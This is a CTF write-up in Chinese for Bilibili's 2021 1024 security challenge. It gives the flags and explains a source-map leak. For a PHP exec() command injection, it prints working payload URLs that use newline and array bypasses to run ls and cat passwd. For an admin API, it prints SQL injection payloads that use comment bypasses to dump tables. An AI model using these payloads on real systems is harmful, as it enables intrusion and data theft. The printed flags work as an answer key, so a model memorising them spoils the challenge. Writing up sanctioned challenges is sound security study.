安全攻防–1

https://security.bilibili.com/sec1024/q/r1.html | 提示

1024程序员节,大家一起和2233参与解密游戏吧~ happy_1024_2233: e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364 0408abca7deabb96a58f50471171b60e02b1a8dbd32db156

image-20211114154001444

a1cd5f84-27966146-3776f301-64031bb9

安全攻防–2

https://security.bilibili.com/sec1024/q/ | 提示

某高级前端开发攻城狮更改了一个前端配置项

提示中给的是vue的官方文档,并且定位到了productionSourceMap

来一波f12

image-20211114154330638

36c7a7b4-cda04af0-8db0368d-b5166480

安全攻防–3

https://security.bilibili.com/sec1024/q/eval.zip | 提示

PHP is the best language for web programming, but what about other languages?

<?php
    /*
        bilibili- ( ゜- ゜)つロ 乾杯~
        uat: http://192.168.3.2/uat/eval.php
        pro: http://security.bilibili.com/sec1024/q/pro/eval.php
    */
    $args = @$_GET['args'];
    if (count($args) >3) {
        exit();
    }
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) ) {
            exit();
        }
    }
    // todo: other filter
    $cmd = "/bin/2233 " . implode(" ", $args);
    exec($cmd, $out);
    for ($i=0; $i<count($out); $i++){
        echo($out[$i]);
        echo('<br>');
    }
?>

可以get方式接收最多3个名为args的参数,对每个参数的值进行正则匹配,最后拼接到$cmd后面被exec执行,用%0a换行+数组[]绕过

payload

https://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=ls
https://security.bilibili.com/sec1024/q/pro/eval.php?args[]=1%0a&args[]=cat&args[]=passwd

9d3c3014-6c6267e7-086aaee5-1f18452a

安全攻防–4

https://security.bilibili.com/sec1024/q/ | 提示

懂的都懂

有个请求api https://security.bilibili.com/sec1024/q/admin/api/v1/log/list,本能的去fuzz一下,结果412了……QAQ

username部分可以sqli,过滤了空格和单引号,用注释和16进制绕过

payload

"user_name": "1/**/union/**/select/**/database(),user(),3,4,5",
"user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()#",
"user_name": "1/**/union/**/select/**/database(),user(),3,4,group_concat(id)/**/from/**/flag#",

3d5dd579-0678ef93-18b70cae-cabc5d51


难度应该算是偏简单的,就是,emmmmmmmmmm

算了,我不好说